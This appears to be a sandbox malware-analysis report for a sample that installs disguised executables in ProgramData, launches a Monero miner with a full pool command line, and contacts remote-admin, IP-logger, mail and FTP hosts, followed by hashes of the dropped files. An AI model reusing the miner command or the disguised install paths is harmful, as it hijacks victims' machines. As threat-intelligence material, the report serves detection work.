"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6372 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6480 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=6760 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=4984 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3468 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6560 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\ProgramData\WindowsTask\AppHost.exe
C:\ProgramData\WindowsTask\AppHost.exe -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] --donate-level=1 -p x -t4
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=2208 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=2216 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=5816 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=1492 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6956 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3048 --field-trial-handle=1756,i,14323050312902301359,95519556986410514,131072 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe" C:\Users\Admin\AppData\Local\Temp\Msd100m.dll
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| US | 8.8.8.8:53 | 83.205.213.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | freemail.freehost.com.ua | udp |
| UA | 194.0.200.251:465 | freemail.freehost.com.ua | tcp |
| US | 8.8.8.8:53 | 251.200.0.194.in-addr.arpa | udp |
| RU | 194.67.198.139:21 | tcp | |
| US | 8.8.8.8:53 | 139.198.67.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kaen.progaming-cheats.ru | udp |
| UA | 185.13.5.48:80 | kaen.progaming-cheats.ru | tcp |
| US | 8.8.8.8:53 | 48.5.13.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.39:45700 | xmr.pool.minergate.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 104.21.76.57:443 | iplogger.com | tcp |
| US | 8.8.8.8:53 | 57.76.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.206:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 142.250.187.238:443 | consent.google.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.dll-files.com | udp |
| FR | 143.244.56.51:443 | www.dll-files.com | tcp |
| FR | 143.244.56.51:443 | www.dll-files.com | tcp |
| US | 8.8.8.8:53 | c.pubguru.net | udp |
| US | 8.8.8.8:53 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | tg1.aniview.com | udp |
| US | 104.18.11.207:443 | maxcdn.bootstrapcdn.com | tcp |
| BG | 18.165.61.75:443 | c.pubguru.net | tcp |
| GB | 142.250.200.42:443 | ajax.googleapis.com | tcp |
| GB | 142.250.200.42:443 | ajax.googleapis.com | tcp |
| GB | 2.21.189.169:443 | tg1.aniview.com | tcp |
| US | 104.18.11.207:443 | maxcdn.bootstrapcdn.com | udp |
| US | 8.8.8.8:53 | player.avplayer.com | udp |
| US | 8.8.8.8:53 | feed.avplayer.com | udp |
| US | 8.8.8.8:53 | track1.aniview.com | udp |
| SE | 92.123.135.71:443 | feed.avplayer.com | tcp |
| US | 96.46.186.186:443 | track1.aniview.com | tcp |
| US | 2.20.12.70:443 | player.avplayer.com | tcp |
| US | 8.8.8.8:53 | a3.pubguru.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| DE | 3.126.156.194:443 | a3.pubguru.net | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| BE | 64.233.166.154:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 51.56.244.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.11.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.61.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.61.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.186.46.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.135.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | tcp |
| DE | 3.126.156.194:443 | a3.pubguru.net | tcp |
| DE | 3.126.156.194:443 | a3.pubguru.net | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| BE | 64.233.166.154:443 | stats.g.doubleclick.net | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| US | 216.239.32.36:443 | region1.analytics.google.com | tcp |
| US | 2.20.12.70:443 | player.avplayer.com | tcp |
| US | 8.8.8.8:53 | player.aniview.com | udp |
| US | 8.8.8.8:53 | 194.156.126.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.166.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content1.avplayer.com | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| US | 2.20.12.70:443 | content1.avplayer.com | tcp |
| GB | 163.70.147.23:443 | connect.facebook.net | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 163.70.147.23:443 | connect.facebook.net | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | go1.aniview.com | udp |
| US | 172.240.45.81:443 | go1.aniview.com | tcp |
| US | 172.240.45.81:443 | go1.aniview.com | tcp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | tcp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 23.147.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| GB | 163.70.147.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| GB | 163.70.147.23:443 | static.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | secure.adnxs.com | udp |
| US | 8.8.8.8:53 | ssp.disqus.com | udp |
| US | 8.8.8.8:53 | u.openx.net | udp |
| US | 8.8.8.8:53 | ads.stickyadstv.com | udp |
| US | 8.8.8.8:53 | secure-assets.rubiconproject.com | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| NL | 185.89.210.141:443 | secure.adnxs.com | tcp |
| NL | 154.57.158.115:443 | ads.stickyadstv.com | tcp |
| NL | 154.57.158.115:443 | ads.stickyadstv.com | tcp |
| BE | 104.68.78.171:443 | secure-assets.rubiconproject.com | tcp |
| GB | 2.21.188.239:443 | ads.pubmatic.com | tcp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 34.194.118.113:443 | ssp.disqus.com | tcp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.147.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.45.240.172.in-addr.arpa | udp |
| US | 18.245.194.122:443 | c.amazon-adsystem.com | tcp |
| US | 34.98.64.218:443 | u.openx.net | tcp |
| US | 8.8.8.8:53 | eus.rubiconproject.com | udp |
| US | 8.8.8.8:53 | sync.aniview.com | udp |
| US | 18.245.194.122:443 | c.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 96.46.186.182:443 | sync.aniview.com | tcp |
| US | 96.46.186.182:443 | sync.aniview.com | tcp |
| GB | 2.21.189.68:443 | eus.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| GB | 2.21.189.68:443 | eus.rubiconproject.com | tcp |
| US | 96.46.186.182:443 | sync.aniview.com | tcp |
| GB | 108.156.39.15:443 | config.aps.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | secure.cdn.fastclick.net | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | cdn.browsiprod.com | udp |
| US | 8.8.8.8:53 | cdn.hadronid.net | udp |
| US | 8.8.8.8:53 | b1sync.zemanta.com | udp |
| BG | 18.244.86.194:443 | aax.amazon-adsystem.com | tcp |
| GB | 23.53.174.156:443 | secure.cdn.fastclick.net | tcp |
| GB | 23.53.174.156:443 | secure.cdn.fastclick.net | tcp |
| US | 50.31.142.95:443 | b1sync.zemanta.com | tcp |
| BG | 52.85.5.92:443 | cdn.browsiprod.com | tcp |
| FR | 18.155.129.34:443 | tags.crwdcntrl.net | tcp |
| US | 172.67.38.106:443 | cdn.id5-sync.com | tcp |
| US | 104.22.53.173:443 | cdn.hadronid.net | tcp |
| US | 8.8.8.8:53 | image6.pubmatic.com | udp |
| NL | 198.47.127.19:443 | image6.pubmatic.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | id.hadron.ad.gt | udp |
| IE | 52.211.142.73:443 | bcp.crwdcntrl.net | tcp |
| US | 172.67.23.234:443 | id.hadron.ad.gt | tcp |
| NL | 23.63.101.171:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | events.browsiprod.com | udp |
| US | 8.8.8.8:53 | yield-manager.browsiprod.com | udp |
| US | 44.238.197.96:443 | events.browsiprod.com | tcp |
| BG | 18.165.61.10:443 | yield-manager.browsiprod.com | tcp |
| US | 8.8.8.8:53 | proc.ad.cpe.dotomi.com | udp |
| US | 8.8.8.8:53 | 141.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.158.57.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.78.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.194.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.64.98.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.188.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.118.194.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.39.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.186.46.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.38.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.129.155.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.53.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.174.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.86.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.5.85.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.142.31.50.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.23.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.142.211.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.101.63.23.in-addr.arpa | udp |
| NL | 89.207.16.210:443 | proc.ad.cpe.dotomi.com | tcp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| NL | 89.207.16.210:443 | proc.ad.cpe.dotomi.com | tcp |
| GB | 142.250.187.202:443 | imasdk.googleapis.com | tcp |
| US | 8.8.8.8:53 | eexsync.com | udp |
| US | 80.77.87.108:443 | eexsync.com | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | a.ad.gt | udp |
| GB | 142.250.187.202:443 | imasdk.googleapis.com | udp |
| US | 8.8.8.8:53 | s0.2mdn.net | udp |
| US | 104.22.4.69:443 | a.ad.gt | tcp |
| GB | 216.58.204.70:443 | s0.2mdn.net | tcp |
| US | 8.8.8.8:53 | 10.61.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.197.238.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.16.207.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.87.77.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.4.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 96.46.186.15:443 | track1.avplayer.com | tcp |
| US | 8.8.8.8:53 | 15.186.46.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.dllme.com | udp |
| US | 104.26.11.126:443 | www.dllme.com | tcp |
| US | 104.26.11.126:443 | www.dllme.com | tcp |
| US | 8.8.8.8:53 | 126.11.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.187.194:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 216.58.201.106:443 | content-autofill.googleapis.com | tcp |
| US | 216.239.32.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | 194.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 104.26.11.126:443 | www.dllme.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | js.hcaptcha.com | udp |
| US | 104.19.229.21:443 | js.hcaptcha.com | tcp |
| US | 8.8.8.8:53 | newassets.hcaptcha.com | udp |
| US | 104.19.230.21:443 | newassets.hcaptcha.com | udp |
| GB | 216.58.201.106:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | api.hcaptcha.com | udp |
| US | 8.8.8.8:53 | 21.229.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.230.19.104.in-addr.arpa | udp |
| US | 104.19.230.21:443 | api.hcaptcha.com | udp |
| US | 8.8.8.8:53 | imgs3.hcaptcha.com | udp |
| US | 104.19.229.21:443 | imgs3.hcaptcha.com | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.39:45700 | xmr.pool.minergate.com | tcp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 35.215.58.216.in-addr.arpa | udp |
| DE | 49.12.80.39:45700 | xmr.pool.minergate.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 216.239.32.36:443 | region1.analytics.google.com | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 172.217.1.99:443 | csi.gstatic.com | tcp |
| US | 8.8.8.8:53 | challenges.cloudflare.com | udp |
| US | 104.17.2.184:443 | challenges.cloudflare.com | tcp |
| US | 104.17.2.184:443 | challenges.cloudflare.com | udp |
| US | 8.8.8.8:53 | 99.1.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.2.17.104.in-addr.arpa | udp |
| GB | 142.250.187.194:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| DE | 49.12.80.40:45700 | xmr.pool.minergate.com | tcp |
| US | 8.8.8.8:53 | 40.80.12.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.39:45700 | xmr.pool.minergate.com | tcp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| BR | 142.251.133.163:443 | beacons2.gvt2.com | tcp |
| BR | 142.251.133.163:443 | beacons2.gvt2.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| BR | 142.251.133.163:443 | beacons2.gvt2.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.133.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.39:45700 | xmr.pool.minergate.com | tcp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| DE | 49.12.80.40:45700 | xmr.pool.minergate.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\aut7DB0.tmp
| MD5 | b9d686e28cae6847ff0cae312f820509 |
| SHA1 | 53af47ab5eb4d1d68d380a7efd9c64cc772b4235 |
| SHA256 | abc359397b8c978490ae5bc15ce1edd8250df5f3205dd00c3857dd6716445d11 |
| SHA512 | 985ff2b2062101de5ab60f6109dc20b16d54c6b06059d789daf4fc78033fd71deefc25787bd4602397310c89f3397e099f4959a60349abb8cff6b82b8b211e1a |
C:\Users\Admin\AppData\Local\Temp\aut80D0.tmp
| MD5 | d043b9a4055bdd9e8f4be4b3da0fcbcb |
| SHA1 | 694956bb32f816245ccb048247020f9274859227 |
| SHA256 | 87ca6b093f27c087dfb62a0bf5eb69c6527aa610af21b3db7245caecfa89581b |
| SHA512 | e7d83f0ebf6b5fc179c61fb282a6fab4b9a982dc759b4f31fec5a35f95a5067d56bc5c22244f6e085496db0e6ebaa88c194c840a8bbb1b30dc7aa2a60318c151 |
C:\ProgramData\Microsoft\Intel\Logs.exe
| MD5 | 32942d3c314bbdf1620cd88103041704 |
| SHA1 | 30d0e5acd4cd2d564fc0238bbd6b2817429a1d21 |
| SHA256 | a5db8a2bfa0de0450b68df20d485031b84ff1bc05870635614c1753668ea62a4 |
| SHA512 | 96a50e3ac5209ccf9e98a1489ee5e48c4b3643e5f29ecc0ad4a7ea5fe9d2db2c20969cd599b071833e5ecca6ce01b89416cd0a9555416aa475cc23a69f682c02 |
C:\ProgramData\Microsoft\Intel\winit.exe
| MD5 | d2a13f45e422348e79683468f2d72f48 |
| SHA1 | a4a5fd1e42499123f6fc7a6995a88707efbec8a8 |
| SHA256 | 9ed880c9e5219168275ea143b4e2e526ff765f4e5c7c7b43224cb8f5cbbbc9aa |
| SHA512 | 6ecd9cb874f724aea6d63dfa031dd28c3ccd0c07c31088b57701902cd397e04e7dc97b4bbde515e80c043840a71728b899b3729bfb5dc001c4166c3442154513 |
C:\Programdata\Microsoft\Intel\L.bat
| MD5 | 6d744b6b4f26582054765190f2a48fc4 |
| SHA1 | f8389be05be2dcbe7b805048d47366da34e654bb |
| SHA256 | 5cec12c6eb8148a88120e020c5a8ec694e1d2b00d88965cb77ce85c936012b7a |
| SHA512 | 95dbf7a2845dfc307ac208c65baff017f65663f0ff8e4ce27100f2ab7c2fdb5a008148eb5f80a25eb2e91f117817a71e1a947114163b75c3948a33cc00135abc |
C:\Programdata\Windows\winit.exe
| MD5 | 0ad9af59a50ebe8e71794c8d6d5b202f |
| SHA1 | 89a63d35581171ba9dff6451295988ff6d108ae9 |
| SHA256 | 5ce115d29377c45b23db067b3f5e77f46e96686b48e7ee4a5ad6e8d52ee5bf0e |
| SHA512 | a69be9e2a5c153dd0cc0783ff24de6a07a02758239979b411d397b7527c676ae9751b92978686999dff00d9c36d1bfbf5f3e9358a98fa6d375876e8a402d339a |
C:\Programdata\Windows\install.vbs
| MD5 | 5e36713ab310d29f2bdd1c93f2f0cad2 |
| SHA1 | 7e768cca6bce132e4e9132e8a00a1786e6351178 |
| SHA256 | cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931 |
| SHA512 | 8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1 |
C:\Programdata\Windows\install.bat
| MD5 | e4d54fbfd7517dc5ca4297a811af79a7 |
| SHA1 | fc1bbcdfaa699340ac02a1fec087c2102d612d81 |
| SHA256 | 9abd59853172258f9eaf360933c13c27bd855e4c7b37840a8f75ea51b0826f3c |
| SHA512 | a5c678becf3c38fcf92dc93506bd252596c346a75a939436b8f2087ab3b5b3b72a577c668e11ff71078276f15ead06676dc6ed3f6d1e0c6df35a896c13989878 |
C:\ProgramData\Microsoft\Intel\svchost.exe
| MD5 | 70ad47ac024936a6bccfd95567c1edfa |
| SHA1 | e1bbe7726bf970c08c2125a54c78fd479e6995ed |
| SHA256 | 56a363311361e03dc395d274de67c2a64068df6b163389be80c7b6736ad0c5da |
| SHA512 | 7929024c6af401066a9afc23d4da42b906f293935bc1628aa0fe901fba46ae979de4cb7818a1bfae9532d9a810987fe5209dadb508d42e0495f294f4b10651b4 |
C:\ProgramData\Microsoft\Intel\P.exe
| MD5 | 4ef6e64af66845bcf9c1bd324e51517f |
| SHA1 | 8f56d5884dd44d875deee14654b081fc407490a7 |
| SHA256 | 5abc1e7138cd3f9ed1d61b6dd5d505c8898ae9cc7f49e0ee45b93be991f520c8 |
